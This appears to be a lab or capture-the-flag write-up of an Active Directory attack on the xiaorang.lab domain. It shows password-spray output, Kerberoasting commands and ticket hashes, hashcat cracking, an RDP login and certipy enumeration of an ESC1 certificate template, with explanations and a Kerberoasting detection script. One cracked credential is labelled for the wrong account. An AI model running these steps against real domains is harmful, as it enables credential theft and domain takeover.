SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangming:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangming:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangming:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangying:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangying:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangying:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangying:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\libo:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\libo:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\libo:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuqin:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuqin:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuqin:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuqin:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangchao:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangchao:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangchao:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangchao:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuli:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuli:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuli:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuli:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangwei:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangwei:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangwei:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangyan:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangyan:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangyan:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangyan:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangjian:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangjian:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangbin:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangbin:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangbin:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangli:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangli:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdan:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdan:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdan:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdan:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuxia:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuxia:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuxia:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuxia:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangrui:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangrui:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangrui:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangrui:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdong:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdong:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdong:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangdong:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangting:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangting:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangting:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangting:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangjian:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [+] xiaorang.lab\zhangjian:i9XDE02pLVf 

zhangjian:i9XDE02pLVf

The flag02 hint mentions an SPN, so the first step is to check whether any domain user accounts have SPNs set. An SPN is the "label" that uniquely identifies a service instance and lets a client locate the account that runs that service.

What is an SPN


🔹 How SPNs work

  • An SPN is the "label" Active Directory uses to uniquely identify a service instance.

  • For example, a SQL Server service running on the host SQLSERVER01 might have the SPN:

    MSSQLSvc/SQLSERVER01.xiaorang.lab:1433
    
  • When a client requests a service, the KDC uses the SPN to find the account the service runs as and issues a Kerberos ticket for that account.


🔹 Why enumerate SPNs on domain user accounts

  1. Service accounts ≠ ordinary user accounts
    In AD, some services (SQL, IIS, Exchange, SharePoint, etc.) run under domain user accounts. Once an SPN is bound to such an account, the account can perform Kerberos authentication on behalf of that service.

  2. In security testing / operations

    • If a domain user account has an SPN bound to it, it is a service account.

    • Such accounts often need elevated privileges, or at least live for a long time, which makes them attractive to attackers.

    • In penetration tests, enumerated SPNs are commonly used for Kerberoasting (requesting the service ticket for that SPN from the DC and cracking the password offline).

  3. Operations / audit value

    • Querying SPNs maps which services in the domain run under which accounts.

    • Security staff can use this to spot weak-password or over-privileged service accounts.

    • Administrators can confirm SPNs are configured correctly and avoid authentication failures.


🔹 How to query

As an administrator, on the DC or a domain member:

setspn -T xiaorang.lab -Q */*

Or with the AD PowerShell module:

Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName | 
  Select-Object SamAccountName, ServicePrincipalName

This lists every domain user with an SPN bound to it.


"The earlier hint mentioned an SPN (Service Principal Name), so we should check which user accounts in the domain have SPNs bound to them, in order to find potential service accounts (high-value targets)."


What is Kerberoasting?

Kerberoasting is a term from the Windows Active Directory / Kerberos attack surface and one of the most common techniques in domain penetration. Here is the white-hat explanation:


🔹 How it works

  1. SPNs and service accounts

    • In AD, many services (e.g. MSSQL, IIS, Exchange) run under a domain user account.

    • That account registers an SPN (Service Principal Name) so that Kerberos can map "a request for some service" to "which account runs it".

  2. Normal Kerberos flow

    • The client wants to access a service → it asks the DC for a service ticket (TGS).

    • The DC looks up the account behind the SPN, encrypts the ticket with that account's long-term key (for RC4 tickets, the NT hash) and returns it.

    • The client then presents the ticket to the service for validation.

  3. What an attacker can do

    • Any ordinary domain user can request a service ticket for any known SPN from the DC.

    • The TGS returned contains a portion encrypted with the service account's password-derived key.

    • The attacker can brute-force that ticket offline and recover the service account's plaintext password.


🔹 Why it is valuable to attackers

  • If the service account password is weak (e.g. Welcome123), it can be brute-forced.

  • Service accounts are often:

    • highly privileged (some are even Domain Admins)

    • left with the same password for years (an ops habit)

    • shared by several critical services

  • Once cracked, the account is used for lateral movement and privilege escalation.


🔹 Typical attack flow (simplified)

  1. Enumerate SPNs → find out which service accounts exist in the domain.

  2. Request TGS (service tickets).

  3. Export the tickets → save them in hash format.

  4. Crack offline → obtain the account's plaintext password.

  5. Use the account for further lateral movement / escalation.


🔹 Defense and mitigation (blue-team view)

  • Strong password policy: service accounts need long, complex passwords that are rotated regularly.

  • Tiered accounts: do not run services under highly privileged accounts.

  • Monitor anomalous ticket requests: bursts of TGS requests or unexpected ticket export activity should raise alerts.

  • Least privilege: service accounts should hold no domain rights beyond what they need.

  • Use managed service accounts (gMSA): their passwords rotate automatically, removing long-lived weak passwords.


In one sentence
Kerberoasting abuses the normal Kerberos ticket request flow to obtain a service account's encrypted ticket, cracks it offline, and thereby recovers a high-value account's password.
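The mitigation bullets above say to monitor for bursts of TGS requests; here is what that check looks like against domain controller security event 4769 records. This is an added example, not part of the original writeup: the events are constructed (the requester, client IP and service account names echo the lab above, svc_backup is invented), the field names follow the 4769 event schema, and the window and threshold are assumptions to tune per environment.

```python
"""Spotting Kerberoasting in DC security logs (event ID 4769).

Added example, not from the original writeup. Event 4769 ("A Kerberos
service ticket was requested") records who asked (TargetUserName), which
SPN owner the ticket was for (ServiceName), from where (IpAddress) and
with which cipher (TicketEncryptionType). A Kerberoast run looks like one
principal pulling tickets for many distinct user service accounts in a
short window, often downgraded to RC4 (0x17) because RC4 tickets are far
cheaper to crack than AES ones.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# TicketEncryptionType values that mean RC4-HMAC (ordinary and export-grade).
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample events (not real logs). Names echo the lab above;
# svc_backup is invented for the demo.
SAMPLE_EVENTS = [
    {"time": "2023-07-14 13:00:01", "user": "wangwei@XIAORANG.LAB",   "service": "XIAORANG-DC$", "ip": "172.22.9.26", "etype": "0x12"},
    {"time": "2023-07-14 13:00:05", "user": "wangwei@XIAORANG.LAB",   "service": "zhangxia",     "ip": "172.22.9.26", "etype": "0x12"},
    {"time": "2023-07-14 13:02:10", "user": "zhangjian@XIAORANG.LAB", "service": "zhangxia",     "ip": "172.22.9.19", "etype": "0x17"},
    {"time": "2023-07-14 13:02:11", "user": "zhangjian@XIAORANG.LAB", "service": "chenchen",     "ip": "172.22.9.19", "etype": "0x17"},
    {"time": "2023-07-14 13:02:12", "user": "zhangjian@XIAORANG.LAB", "service": "svc_backup",   "ip": "172.22.9.19", "etype": "0x17"},
    {"time": "2023-07-14 13:02:13", "user": "zhangjian@XIAORANG.LAB", "service": "WIN2016$",     "ip": "172.22.9.19", "etype": "0x17"},
    {"time": "2023-07-14 15:40:00", "user": "zhangjian@XIAORANG.LAB", "service": "zhangxia",     "ip": "172.22.9.19", "etype": "0x12"},
]


def is_user_service(service_name):
    """Kerberoasting targets user service accounts: drop computer accounts
    (trailing $) and krbtgt, whose tickets are routine noise."""
    account = service_name.split("/")[0]
    return not account.endswith("$") and account.lower() != "krbtgt"


def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return one alert per (requester, client IP) that requested tickets for
    at least `min_services` distinct user service accounts inside any
    `window`-long span. Thresholds are assumptions; tune per environment."""
    requests = defaultdict(list)
    for event in events:
        if not is_user_service(event["service"]):
            continue
        when = datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")
        requests[(event["user"], event["ip"])].append((when, event["service"], event["etype"]))

    alerts = []
    for (user, ip), reqs in requests.items():
        reqs.sort()
        best, start = None, 0
        for end in range(len(reqs)):  # sliding window over time-sorted requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            span = reqs[start:end + 1]
            services = {name for _, name, _ in span}
            if len(services) >= min_services and (best is None or len(services) > len(best["services"])):
                rc4 = sum(1 for _, _, etype in span if etype in RC4_ETYPES)
                best = {"user": user, "ip": ip, "services": sorted(services),
                        "rc4_share": rc4 / len(span),
                        "first": span[0][0].isoformat(), "last": span[-1][0].isoformat()}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS):
        print(f"[!] {alert['user']} from {alert['ip']} requested tickets for "
              f"{len(alert['services'])} service accounts between {alert['first']} and "
              f"{alert['last']} (RC4 share {alert['rc4_share']:.0%}): {', '.join(alert['services'])}")
```

The RC4 share is reported rather than used as a hard filter: an account that is configured to accept AES only will produce no 0x17 tickets at all, so the volume pattern is the primary signal and the cipher downgrade is corroboration.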


SPN

proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

┌──(root㉿kali-plus)-[~/Desktop/kali/HackTheBox/Certify]
└─# proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:389  ...  OK
ServicePrincipalName                   Name      MemberOf  PasswordLastSet             LastLogon  Delegation 
-------------------------------------  --------  --------  --------------------------  ---------  ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab  zhangxia            2023-07-14 12:45:45.213944  <never>               
WWW/desktop-cbktvmo.xiaorang.lab/IIS   zhangxia            2023-07-14 12:45:45.213944  <never>               
TERMSERV/win2016.xiaorang.lab          chenchen            2023-07-14 12:45:39.767035  <never>               



[-] CCache file is not found. Skipping...
[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:88  ...  OK
[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:88  ...  OK
[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:88  ...  OK
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$f54cc8fd7b872b44b5bff49640e91645$3f354e9d4663a5a467225b991205113741c89fc8a21742f39f293ad4e652efc27626595c6c8413773955d70761385dcd38bf01f9b921f76739462a937b19249d4638addcb43eb2bef49a05e5bc68a3850eb333e3a0469e00a7c2242f95d73a6416af814773a3ccc51ed325021f9b15acc86e8a5a02186df3181b091e27daef968c9b373bc76fc92dec6c9f8cfbf75023482a5dba3a9534a8969d0d030c2906785a4b1bd0618035ed71ac327033b2ba55cc686b973fcc15ab5dba11381b2c31adcccd82f702fa9b6d1d3e0b9118fb2f3162b866f81ab1a24a6ed4cac217a190f53ac27a1760cb3ef991b0ffcaafeaeec02191b7203ac4921175f398121d92194c8d9b5ab52abf047d60b227ba0bb41574d61f7b6bfb00a6e5d03e5511f47903ad73eee61755fce4434ea3a9ce79d42edb64502ef388413eeb4d97c67cdb18b965976acb715336f77aad7595b344e9c953bb3bb50522ec242ab6f634359459255c52fbdbe0293f98209dc01cb1aba9a3dc05ea8b909706cbd3dd7102033cd8ab16ba3ca70534ef1aed7704e68a1a7aff222890cd29c5d700d29811d31133a4014bc8c330825e36022d2358635eae6d9564bcf6bc4134de676005d0bf54a9c85b298bb92e8910d7ae671adcb6f3d4cd770198fcecb9bd44f6df2777679619d4ffc5200d4c7ae1bbe075e660c44f640bfd2cbc0bff1aaf15270e11549ef167e0bc6e43012f3ff6799d9d8e51d5c9bb602838902c171dfc2458a1ba5a84e2bd4081af8266cf8bcc6eba29f727288909b52d6c01c0a9fc5f0570a1520d970a7b22b842abf33447c972f3e12cf7a419263c34c6fb30bc0da8e220f0c9cb1affb966a2e5169e0b116e90ab3e8167fe55bfef85f787729b3c63ea15862073e7ed943f511f5c8c1aaa422aec6fde8d876359734bcbe5de15dd3c98fb96f0eb8b6183c895346b3b2eef36e1cae52605fe9125156038a008a5438d925c4142b0a7cf007709a9720e70fd343d8b61d07f3d765deca8ded922cdfbd06e4ee857f92e5357195c35955fa0f7ab844ab4515e4b42249d6e4cdcaee156ac860c555faee1f43ee93713ddc7fe44476507fae7ad4f65c78470c634ad2d200f779e2e68b3c2d3e025a8ce8aab4b922f3bbd4d17e604ae97f94033ca8c80936f473494cf2350392be7076a75603977ae89e877ea0d4f3dffca691c0757e410a5f2d593e176845820f785b415547f41a2938e42eb88f9c8903d0fff774c28599f828edeb08ac3c756be1a1bfb189c86d8df66b4699bad7d481c7436813ddb6f9c533f405f88cac79312c3fdd561b5fa8a5c30ef7b3c71b6cf04ef75b35bdae6f228422b64c67
80740786cc274ee067e670d225b8935c89bebf263e9b736d830983afe88459dcb75dd94dfc2100f748e47bbfbb2394205fb94c4f4d4ad1095b57e5804229c07d4fc03dd457211fe0d63dad90168a9fcede26346d52952bb07a5d8694b8910dec02fb3777718978da942e457de20e564ae1361d9
[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:88  ...  OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$2547cc9cb294457f281ea0587c5a6e99$b3dcf0906c98f4e554e3c0d8d19035e01d6ee0ceaa871ff2b7bf9ca75340c06d919e262c1590278ba2f7b132df67829b17d229993936097f2ba7c3ed1f558ce98d280878d143b7e94834a58f5d0a7cd4803cbca98438e70123dd02624b3f1b6b3ab6184c3cbbfe678148d05edff706004f05d734840ba6df29c478766b475bc8325d8371ef3ffe95bafc9fd74a2d0d2171f6dad639c50869968eaa397d5f68edda9aab0edce5dabc5437206c45aac7fa0fb16669dfeed62e55b58969c06e2629f032886de1f677bcbd406fddce02d59faf82165ce15ff4cc8089c300565a5b945b8688bcdcce3207d536173fe6db00c58d19d24e69907065d2fe9fc96c5ee23935a943ece9d32e62a4d6511ce0d51618ab9b5553879097accacdea0d6145aa88babd2180395a1d2b0ade6beb3265867897dac599dc8e44b4b906b080be1b83fd7ce923681222480a056637bae173d6e93d2ebca47d4de457d752d6d3d19e0bb75fc4732c6f7160a203773d420cc47e230f1bff56dad8fc15af6e4bde5cf6803d31af4eb11881a1dfb022cec44539a1c1e1237c4c940648452d2f2830895e7716a7eb925f81379524659d9b10d0dde07984d7466fb6f21c9a8fb4a66b8118009575332e8785f43afd87007ea90ee990d62c62d40644a1cc511de4e4ef2536da50144f5210a84d2a3d9124332b4800cfbf7c1773be627be068c0c20f2100ab8c3efba3db9fda17a03475c77aa126e15c922cac15fc94797ff6b7ad54c03e4763ae49ffa140a1823a8b2578f0eb662b2e7b21b96503c3f3dec4d43c4ac525356fa61f1f247a5447db229212286684c93289c4318387135590a56dffa930e4b22f52319327da068e7a5b14b70bf2e5bb18577b0dde4e13c613f8480098cbe7155c5dbd9e2653008d2bcdf98dbbcb3029cb91fc3f886f430bfd61a23d9ef427aa0a47bee54b62e07d2d0e885984b1d2dfbba2c3455fbbbb2fa8fc830db16d016d3653fa17631bf2c5bd386673bbef39b666ddc0fb98db54f61b4ca22e74d2b36db958e7b8a48da8d6d5a70f55dcc6b78fe1105b656f3bc0be6ce1b8e5345c4a94b477374e79a10e292a9fb15e4421f87bf35b940dd37b5f74b53184a453fe0b12519f2bb642e67e09099ff858bf93bba14df6dcbb52d5055fe5dbc4a09b14d3e69d78d317be19a104961d6fb408bd987fba1816b1f3f5f7f932fbc5c41712a761640d577811537626563c1b9dfbbc77efb1734e54f6d4c1f5f1236ffd6ddc29db14399ac712bf856ee1464b0f07c957125ff1b46d993f5eaa1ddb779847c78fdc28ecfe5bc2caa8f47e24431813355da8e65e2812db84c901bcc31b8d1
110752df4d99cb428cdcb2498d9ff969f053423a5a302d769d89610461515be28abbfc3db0d4355a537134befd6be9e0bcd791dc5cd1b4b33cb4d985fe434d689d63900f3c0c4ed48c31355e3e679a4f9bb49de7599638e26c175c955403f5c4ff54fe301bf95976ba8d368db0625d5bade8846
zhangjian:i9XDE02pLVf
liupeng:fiAzGwEMgTY

hash.txt looks like this:

$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$f54cc8fd7b872b44b5bff49640e91645$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
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt 

Account/password: zhangjian/MyPass2@@6
proxychains4 xfreerdp /v:172.22.9.26 \
/u:zhangxia /d:xiaorang.lab /p:'MyPass2@@6' \
/sec:nla /cert:ignore /tls-seclevel:0 \
/drive:share,/home/kali/Desktop/tmp

ESC1

First query for vulnerable configurations; ESC1 shows up immediately.

proxychains certipy-ad find -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

What is certipy-ad

certipy-ad is a tool built specifically for attacking and abusing Active Directory Certificate Services (AD CS). It is one of the standard tools for pentesters, red teams and CTF players.


What it does

It revolves around certificate service weaknesses in Windows domain environments, for example:

  1. Enumeration

    • Enumerate the certificate authorities (CAs) deployed in the domain

    • Enumerate certificate templates

    • Show which templates ordinary users can enroll in and which have risky settings

  2. Vulnerability detection

    • Detect template misconfigurations (such as ENROLLEE_SUPPLIES_SUBJECT) that let a user request a certificate for someone else's identity

    • Check certificate permissions for the ESC1 through ESC13 attack vectors

  3. Exploitation

    • Request a certificate for a high-privileged account (e.g. a domain admin) and use it to impersonate that account

    • Export a PFX certificate file for Kerberos authentication or remote login

    • Combined with Rubeus / mimikatz, obtain a TGT or go straight to RDP

  4. Post-exploitation

    • Use the forged certificate to obtain domain administrator privileges

    • Lateral movement (Pass-the-Certificate / Pass-the-Ticket)


Why it matters

In real enterprise domains, many administrators deploy Active Directory Certificate Services (AD CS) but misconfigure it, which lets a low-privileged domain user escalate straight to domain admin through the certificate chain.
Certipy automates these otherwise laborious manual steps, which is why it is a staple of red-team and penetration-test toolkits.


Common usage examples

# Enumerate AD CS configuration and templates
certipy-ad find -u 'user@domain.local' -p 'Password123' -dc-ip 10.0.0.1 -vulnerable

# Request a certificate
certipy-ad req -u 'user@domain.local' -p 'Password123' -ca CA_NAME -template TEMPLATE_NAME

# Request a certificate for another UPN (the result is saved as a PFX)
certipy-ad req -u 'user@domain.local' -p 'Password123' -ca CA_NAME -template TEMPLATE_NAME -upn 'administrator@domain.local' -key-size 4096

🔑 In one sentence
certipy-ad is the tool for attacking and abusing certificate services (AD CS) in a domain environment.

┌──(root㉿kali-plus)-[~]
└─# proxychains4 certipy-ad find -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:636  ...  OK
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.402 seconds: Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:445  ...  OK
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'xiaorang-XIAORANG-DC-CA'
[*] Checking web enrollment for CA 'xiaorang-XIAORANG-DC-CA' @ 'XIAORANG-DC.xiaorang.lab'
[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:80  ...  OK
[proxychains] Strict chain  ...  VPSIP:5001  ...  172.22.9.7:443 <--socket error or timeout!
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : xiaorang-XIAORANG-DC-CA
    DNS Name                            : XIAORANG-DC.xiaorang.lab
    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start          : 2023-07-14 04:33:21+00:00
    Certificate Validity End            : 2028-07-14 04:43:21+00:00
    Web Enrollment
      HTTP
        Enabled                         : True
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : XIAORANG.LAB\Administrators
      Access Rights
        ManageCa                        : XIAORANG.LAB\Administrators
                                          XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        ManageCertificates              : XIAORANG.LAB\Administrators
                                          XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        Enroll                          : XIAORANG.LAB\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled over HTTP.
Certificate Templates
  0
    Template Name                       : XR Manager
    Display Name                        : XR Manager
    Certificate Authorities             : xiaorang-XIAORANG-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-07-14T04:51:15+00:00
    Template Last Modified              : 2023-07-14T04:51:44+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner                           : XIAORANG.LAB\Administrator
